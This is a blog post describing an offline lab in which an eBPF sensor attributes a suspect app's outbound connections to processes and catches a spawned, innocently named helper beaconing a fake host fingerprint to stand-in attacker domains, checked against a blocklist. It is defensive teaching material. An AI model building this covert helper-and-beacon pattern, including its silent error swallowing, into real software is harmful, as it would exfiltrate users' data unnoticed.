~/tech-with-ugur

No Proxy, No CA, No Cooperation: Catch an App Phoning Home with eBPF

2026-08-24 cybersecurity

Run the companion lab

A companion lab stood in front of a freshly downloaded app with a transparent proxy and read what it sent. This one stands underneath it. Same question — what is this thing talking to? — asked from the other side of the stack: instead of routing the app’s traffic through a gateway, an eBPF sensor subscribes to kernel events and watches the app from below. Every DNS answer it receives, every TCP connect it makes, every process it spawns — and, the part a proxy fundamentally cannot recover, which process in its tree did each one.

That last point is the whole reason to bother. The trojanized-installer wave that drove the proxy lab — QuickFox VPN installers backdoored for a year, fake download sites for popular apps, a fake 7-Zip campaign turning PCs into proxy nodes — shares a habit: the implant drops a separate helper binary and lets that do the phoning home. A network-only view sees the beacon leave and names the destination, but it cannot tell you the main app made a benign update check while a spawned child did the exfiltration. Kernel-level process attribution can. Everything below runs offline in Docker; the only “secret” that leaks is an obviously fake canary, and every code block is copied verbatim from the lab.

Two vantage points on one connection

When an app reaches out over HTTPS you can stand in one of two places, and each sees exactly what the other is blind to:

VantageSeesCan’t see
In front (proxy, the companion lab)the decrypted request — method, path, bodywhich local process opened the connection
Underneath (eBPF, this lab)the process, its binary, its full parent lineageone byte of the encrypted payload

The proxy lab reads what left the machine. This lab reads who sent it. They are complements, not rivals — and the covert beacon in this lab is engineered to make the difference visible: it comes from a different process than the honest traffic, which the proxy would blend into one anonymous stream of connections and this sensor pulls cleanly apart.

The suspect drops a helper

The “freshly downloaded app” is a small Node.js program. Its main process does the honest thing — an update check to the vendor — then it drops a helper binary and spawns it to do the beaconing, so the two activities have process lineages the sensor can tell apart.

labs/lab-app-egress-ebpf/suspect-app/src/index.ts:

async function main(): Promise<void> {
  const cfg = loadConfig(process.env);
  await checkForUpdate(cfg, logger);
  await runHelper(cfg, logger);
  logger.info({ settleMs: cfg.settleMs }, "Settling before exit...");
  await new Promise((r) => setTimeout(r, cfg.settleMs));
}

checkForUpdate runs in this main process — a plain GET https://updates.goodvendor.lab/version, the cover story every honest app performs. runHelper is where it gets interesting:

labs/lab-app-egress-ebpf/suspect-app/src/index.ts:

function runHelper(cfg: SuspectConfig, logger: Logger): Promise<void> {
  return new Promise((resolve, reject) => {
    logger.info({ bin: cfg.helperBin }, "Spawning helper...");
    const child = spawn(cfg.helperBin, ["--import", "tsx", cfg.helperScript], {
      stdio: "inherit",
      env: process.env,
    });
    child.on("error", reject);
    child.on("exit", (code) => {
      logger.info({ code }, "Helper exited.");
      resolve();
    });
  });
}

cfg.helperBin is /app/bin/sys-helper — and that binary is dropped at image build time, which is the faithful detail. It isn’t malware; it’s a copy of the Node runtime under an innocent name, so the kernel sensor has two distinct process identities to attribute traffic to.

labs/lab-app-egress-ebpf/suspect-app/Dockerfile:

# "Drop" the helper binary: a copy of the Node runtime under an innocent name.
# The app spawns THIS to run the beacon code, so the kernel sensor sees the
# covert traffic coming from `sys-helper`, a child of the main `node` process.
RUN mkdir -p /app/bin && cp "$(command -v node)" /app/bin/sys-helper

The helper, running as sys-helper, builds a host fingerprint and POSTs it to two domains the vendor doesn’t own. As in the companion lab, the fingerprint is an obviously fake, self-labeling canary — it reads nothing off the real machine:

labs/lab-app-egress-ebpf/suspect-app/src/fingerprint.ts:

export function buildFingerprint(): HostFingerprint {
  return {
    host: "LAB-CANARY-NOT-A-REAL-HOST",
    user: "labuser",
    osBuild: "lab-os-0",
    fingerprint: "FAKE-FP-000-lab-only",
  };
}

And the beacon swallows its own errors — real spyware never crashes the application it rides in, because a crash gets noticed. The update check, by contrast, throws loudly like honest code does.

labs/lab-app-egress-ebpf/suspect-app/src/egress/beacon.ts:

export async function sendBeacon(
  url: string,
  fingerprint: HostFingerprint,
  caPath: string,
  logger: Logger,
): Promise<void> {
  try {
    logger.info({ url }, "Beaconing host fingerprint...");
    await postJson(url, JSON.stringify(fingerprint), caPath);
    logger.info({ url }, "Beaconing host fingerprint succeeded.");
  } catch (err) {
    // Spyware never lets itself crash the host application — that would get it
    // noticed. Swallow the failure and move on to the next sink.
    logger.warn({ err, url }, "Beaconing host fingerprint failed.");
  }
}

Every beacon is ordinary HTTPS and stays encrypted end to end. Nothing here decrypts it — that is the point. The sensor never needs to.

Standing up the sensor and scoping it to one container

The sensor is Tracee, an eBPF runtime security tool, pinned to one image. It is the only privileged service in the stack, because loading eBPF programs into the running kernel and reading every process’s syscalls genuinely requires it.

labs/lab-app-egress-ebpf/docker-compose.yml:

  tracee:
    image: aquasec/tracee:0.24.1
    privileged: true
    pid: host
    cgroup: host
    command:
      - --scope
      - uts=suspect-app
      - --events
      - net_packet_dns,security_socket_connect,sched_process_exec
      - --output
      - json:/events/tracee.jsonl
      - --output
      - option:parse-arguments
      - --server
      - http-address=:3366
      - --server
      - healthz

Two flags carry the design. --scope uts=suspect-app narrows what Tracee reports to processes whose UTS-namespace hostname is suspect-app — which is exactly the hostname: compose sets on the one container we care about. Container IDs aren’t known before compose starts; the UTS name is, so scoping on it is deterministic. And --output option:parse-arguments is what makes Tracee decode each event’s arguments — the DNS answer records, the socket address, the exec path — into structured JSON instead of raw bytes.

The three subscribed events each feed one part of the join:

EventFires whenGives us
net_packet_dnsa DNS response crosses the wireFQDN → IP
security_socket_connecta process calls connect() on a TCP socketIP + port + the pid that dialed it
sched_process_execa process replaces its image via execvepid → binary path, argv, and parent pid

The app itself gets none of this. It has no proxy environment variables, no injected CA, no added capabilities, no shared namespace — its only network-relevant compose key is dns:, no different from what DHCP hands out on a real network. It cooperates with nothing; the sensor watches from entirely outside it.

The join: turning IPs and pids back into something readable

A kernel connect event only ever gives you an IP and a pid. Neither is legible on its own. The analyzer stitches them into an FQDN and a process lineage with two independent lookups, one against the DNS stream and one against the exec stream.

First, IP back to FQDN. Every net_packet_dns answer is folded into a timeline; a connect’s IP is resolved to the most recent DNS answer for that IP at or before the connect happened.

labs/lab-app-egress-ebpf/analyzer/src/dnsAnswers.ts:

export function fqdnForIp(ip: string, at: number, answers: DnsAnswer[]): string | null {
  let best: DnsAnswer | null = null;
  for (const a of answers) {
    if (a.ip !== ip) continue;
    if (a.timestamp <= at && (!best || a.timestamp > best.timestamp)) best = a;
  }
  if (best) return best.fqdn;
  const any = answers.find((a) => a.ip === ip);
  return any ? any.fqdn : null;
}

Second, pid back to lineage. Every sched_process_exec event is folded into a process table keyed by pid, carrying each process’s binary path and parent pid; lineage then walks that table by ppid — process to parent to grandparent — until it hits pid 1 or runs out of ancestors.

labs/lab-app-egress-ebpf/analyzer/src/processTable.ts:

export function lineage(pid: number, table: Map<number, Proc>): Proc[] {
  const chain: Proc[] = [];
  const seen = new Set<number>();
  let current = table.get(pid);
  while (current && !seen.has(current.pid)) {
    chain.push(current);
    seen.add(current.pid);
    if (current.pid === 1 || current.ppid <= 0) break;
    current = table.get(current.ppid);
  }
  return chain;
}

Both lookups meet in attribute, which takes each TCP connect, names its destination via fqdnForIp, and attaches the connecting process’s lineage, grouping every connect by the FQDN it reached.

labs/lab-app-egress-ebpf/analyzer/src/attribute.ts:

export function attribute(events: TraceeEvent[]): Attribution[] {
  const answers = dnsAnswers(events);
  const table = buildProcessTable(events);
  const groups = new Map<string, Attribution>();
  for (const c of tcpConnects(events)) {
    const fqdn = fqdnForIp(c.ip, c.timestamp, answers) ?? c.ip;
    let group = groups.get(fqdn);
    if (!group) {
      const proc = table.get(c.pid) ?? null;
      group = { fqdn, ips: [], pid: c.pid, process: proc, lineage: lineage(c.pid, table) };
      groups.set(fqdn, group);
    }
    if (!group.ips.includes(c.ip)) group.ips.push(c.ip);
  }
  return [...groups.values()];
}

Notice what this pipeline never touches: a packet payload. It consumes only pids, IPs, and timestamps — the kernel’s-eye view — and that is enough to say who connected where.

Why every domain gets its own IP

One design choice matters more here than it would with a proxy. A proxy reads SNI or a Host header, so several names behind one IP are still distinguishable. security_socket_connect gives the analyzer only an IP — there is no name on the wire, because nothing is being decrypted. So the lab’s resolver maps each name to a distinct address, even though a single webhost container answers on all three via alias IPs.

labs/lab-app-egress-ebpf/dns/dnsmasq.conf:

address=/updates.goodvendor.lab/10.10.0.10
address=/cdn-metrics.tracklab.lab/10.10.0.11
address=/telemetry.adnexus.lab/10.10.0.12

If two FQDNs shared one IP, the connect-IP → FQDN join would be genuinely ambiguous — the kernel has no way to tell them apart. Per-name IPs keep the join exact for this lab. A real CDN putting unrelated hostnames behind one edge IP would not have that property, which is one of the honest limits below.

The payoff: a beacon traced to its process

The verdict comes from a threat-intel blocklist — a committed snapshot in the same hosts format feeds like URLhaus publish, so it could be dropped onto a Pi-hole unchanged. The two beacon domains are on it; the vendor deliberately is not.

labs/lab-app-egress-ebpf/threat-intel/blocklist.hosts:

# --- seeded lab malware infrastructure ---
0.0.0.0 cdn-metrics.tracklab.lab
0.0.0.0 telemetry.adnexus.lab

The report joins the attribution to that blocklist, one row per FQDN, carrying the verdict and the full offending process:

labs/lab-app-egress-ebpf/analyzer/src/report.ts:

export function buildReport(events: TraceeEvent[], blocklist: Set<string>): Report {
  const rows: Row[] = attribute(events).map((a) => ({
    fqdn: a.fqdn,
    ips: a.ips,
    verdict: blocklist.has(a.fqdn.toLowerCase()) ? "malicious" : "clean",
    process: a.process
      ? { pid: a.process.pid, comm: a.process.comm, path: a.process.path }
      : null,
    lineage: a.lineage.map((p) => ({ pid: p.pid, comm: p.comm, path: p.path, argv: p.argv })),
  }));
  rows.sort((x, y) => x.fqdn.localeCompare(y.fqdn));
  return { rows };
}

Run it, and the analyzer prints the finding as a table:

FQDNVerdictProcessLineage
cdn-metrics.tracklab.labmalicioussys-helper (/app/bin/sys-helper)sys-helper ← node ← node ← sh ← node
telemetry.adnexus.labmalicioussys-helper (/app/bin/sys-helper)sys-helper ← node ← node ← sh ← node
updates.goodvendor.labcleannode (/usr/local/bin/node)node ← node ← sh ← node

Read the process column. Both malicious beacons are attributed to sys-helper — the dropped binary, a child of the main node process — while the benign update check is attributed to node itself. That split, recovered from a completely passive kernel sensor with zero cooperation from the app, is the thing the proxy lab structurally cannot produce. A network view would show three connections leaving one container; this view shows that a spawned helper, not the app you launched, is the one talking to attacker infrastructure.

And “zero cooperation” isn’t a slogan — the end-to-end gate asserts it against the resolved compose config, failing the run if the app ever grows a way to opt in:

labs/lab-app-egress-ebpf/analyzer/src/verify.ts:

const FORBIDDEN_ENV = [
  "HTTP_PROXY", "HTTPS_PROXY", "ALL_PROXY", "http_proxy", "https_proxy", "all_proxy",
  "NODE_EXTRA_CA_CERTS", "SSL_CERT_FILE", "NODE_TLS_REJECT_UNAUTHORIZED",
];
const FORBIDDEN_KEYS = ["cap_add", "privileged", "network_mode", "extra_hosts", "sysctls"];

The honest limit, and the pairing

The kernel view tells you where a process connected and which process, with what ancestry, made the call. It never tells you what was sent — security_socket_connect fires on the TCP handshake, long before any TLS payload exists to read. Three specific blind spots follow from that:

That floor is exactly where the companion mitmproxy egress-gateway lab picks up: it decrypts the payload and reads what left the machine, at the cost of the process attribution this lab makes its whole point. Neither is the complete answer to “what is this app doing?” — you want both vantage points, the one in front and the one underneath. On Kubernetes the same kernel-level approach is what Tetragon provides with a policy model instead of raw event streams; the technique scales well past a laptop.

The full build — the readiness gating that guarantees no event is missed, the alias-IP webhost, the deterministic e2e gate — is in the lab README.